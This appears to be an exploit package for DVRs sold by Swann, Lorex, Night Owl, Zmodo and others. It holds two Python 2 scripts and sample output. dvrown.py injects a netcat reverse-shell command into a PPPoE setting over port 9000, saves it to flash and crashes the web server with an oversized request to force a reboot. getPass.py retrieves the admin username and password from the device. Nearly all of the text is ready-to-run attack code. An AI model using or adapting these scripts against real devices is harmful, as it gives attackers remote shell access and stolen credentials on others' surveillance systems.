Own your DVR (Mfgs: Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc.; models: DVR04B, DVR08B, DVR-16CIF, DVR16B, etc.)

! README.txt

See the original post for the source of this code:
http://console-cowboys.blogspot.com/2013/01/swann-song-dvr-insecurity.html

dvrown.py

import socket,os,sys,re

if(len(sys.argv)<4):
	print 'Usage: %s <target> <connectback host> <connectback port>' % sys.argv[0]
	sys.exit()
lHost = sys.argv[2] 
lPort = sys.argv[3]



#stage 1 - updates the settings
s1 ='REMOTE HI_SRDK_NET_SetPppoeAttr MCTP/1.0\r\n'
s1 +='CSeq:3\r\n'
s1 +='Accept:text/HDP\r\n'
s1 +='Content-Type:text/HDP\r\n'
s1 +='Func-Version:0x10\r\n'
s1 +='Content-Length:249\r\n\r\n'
s2 = 'Segment-Num:1\r\n'
s2 += 'Segment-Seq:1\r\n'
s2 += 'Data-Length:200\r\n\r\n'

payload = '\x01' + '\x00' * 67
payload += ';udhcpc;nc -e /bin/sh' + '\x00' * 11
#payload += '%s %s&' +  '\x00' * (30 - (len(lHost),len(lPort))) % (lHost,lPort)
payload += '%s %s&%s' % (lHost,lPort,('\x00' * (30 - (len(lHost)+len(lPort)))))
payload += '\x00' * 70


sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((sys.argv[1],9000))

print '[*]Sending Stage 1'
sock.send(s1+s2+payload)
sock.recv(1024)
sock.close()

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((sys.argv[1],9000))

#stage 2 - tells the device to save to memory
print '[*]Sending Stage 2'
s1 = 'REMOTE HI_SRDK_DEV_SaveFlash MCTP/1.0\r\n'
s1 += 'CSeq:4\r\n'
s1 += 'Accept:text/HDP\r\n'
s1 += 'Content-Type:text/HDP\r\n'
s1 += 'Func-Version:0x10\r\n'
s1 += 'Content-Length:15\r\n\r\n'
s1 += 'Segment-Num:0\r\n'

sock.send(s1)
sock.recv(1024)
sock.close()


print '[*]Rebooting the server with crash....'
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((sys.argv[1],80))
sock.send('GET /' + 'A'*4000 + 'HTTP/1.1\r\n\r\n\r\n')
sock.close()

os.system('nc -lv %s' % lPort)

example_usage.txt

$ python getPass.py 192.168.10.69
#    [*]Host: 192.168.10.69
#    [+]Username: admin
#    [+]Password: 123456


# Usage: sploit.py <target> <connectback host> <connectback port>
$ python sploit.py 192.168.10.69 192.168.10.66 9999
#    [*]Sending Stage 1
#    [*]Sending Stage 2
#    [*]Rebooting the server with crash....
#    Ncat: Version 5.21 ( http://nmap.org/ncat )
#    Ncat: Listening on 0.0.0.0:9999

getPass.py

import socket,binascii,sys,re

t1 = '00000000000000000000010000000e0f0000000000000000000014000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000'

sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.settimeout(2)
try:
	sock.connect((sys.argv[1],9000))
	sock.send(binascii.unhexlify(t1))
except:
	print '[!] Bad host.'
	exit()
b = ''
rcount = 0
while(rcount <=20):
	try:
		a = sock.recv(1024)
	except:
		print '[!] No reply, not vuln'
		sock.close()
		exit()
	if(a == ''):
		break
	b = re.findall('(admin)\x00{5}([\w]{0,})\x00{2}[\w]',a)
	if(b):
		print '[*]Host: %s' % sys.argv[1]
		print '[+]Username: %s' % b[0][0]
		print '[+]Password: %s' % b[0][1]
		break
	rcount += 1